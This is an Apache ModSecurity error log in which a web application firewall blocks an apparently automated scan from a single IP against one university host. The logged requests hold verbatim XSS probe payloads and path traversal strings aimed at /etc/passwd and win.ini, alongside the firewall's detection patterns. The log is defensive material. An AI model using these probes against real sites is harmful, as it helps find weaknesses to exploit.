[Tue Aug 29 11:56:13.592085 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAApXgtcAAAAU"]
[Tue Aug 29 11:56:15.168347 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAAq3a8MAAAAI"]
[Tue Aug 29 11:56:15.209671 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAArC7igAAAAW"]
[Tue Aug 29 11:56:15.627721 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAApXgt0AAAAU"]
[Tue Aug 29 11:56:16.835610 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAArC7i0AAAAW"]
[Tue Aug 29 11:56:16.895376 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAArC7i8AAAAW"]
[Tue Aug 29 11:56:17.545506 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAApXguAAAAAU"]
[Tue Aug 29 11:56:18.894900 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAqeFm0AAAAx"]
[Tue Aug 29 11:56:19.554780 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAqeFnMAAAAx"]
[Tue Aug 29 11:56:21.851438 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkYAAAAZ"]
[Tue Aug 29 11:56:21.930781 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXkoAAAAZ"]
[Tue Aug 29 11:56:22.915289 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArIASYAAAAX"]
[Tue Aug 29 11:56:23.531967 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAq3a94AAAAI"]
[Tue Aug 29 11:56:23.670599 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArKv10AAAAa"]
[Tue Aug 29 11:56:24.815508 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArB10kAAAAV"]
[Tue Aug 29 11:56:25.734756 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAq3a@QAAAAI"]
[Tue Aug 29 11:56:26.991632 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16esCo-f0AAArHa1sAAAAJ"]
[Tue Aug 29 11:56:29.623348 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAAqeFooAAAAx"]
[Tue Aug 29 11:56:30.587178 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqsV9wAAAAB"]
[Tue Aug 29 11:56:30.628144 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAqsV94AAAAB"]
[Tue Aug 29 11:56:32.780482 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_abfa90f666903dc891da995b2ce41b245c240c54"): Internal error [hostname "digilibfeb.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAAq@sl4AAAAM"]
[Tue Aug 29 11:56:33.605406 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqeFpwAAAAx"]
[Tue Aug 29 11:56:34.574486 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAocykkAAAAR"]
[Tue Aug 29 11:56:36.633604 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@smwAAAAM"]
[Tue Aug 29 11:56:36.714683 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAolK3wAAAAe"]
[Tue Aug 29 11:56:37.535924 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAoz8LkAAAAS"]
[Tue Aug 29 11:56:39.631328 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArZPx0AAAAC"]
[Tue Aug 29 11:56:39.659334 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArIAV8AAAAX"]
[Tue Aug 29 11:56:39.779443 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAAq-HdsAAAAT"]
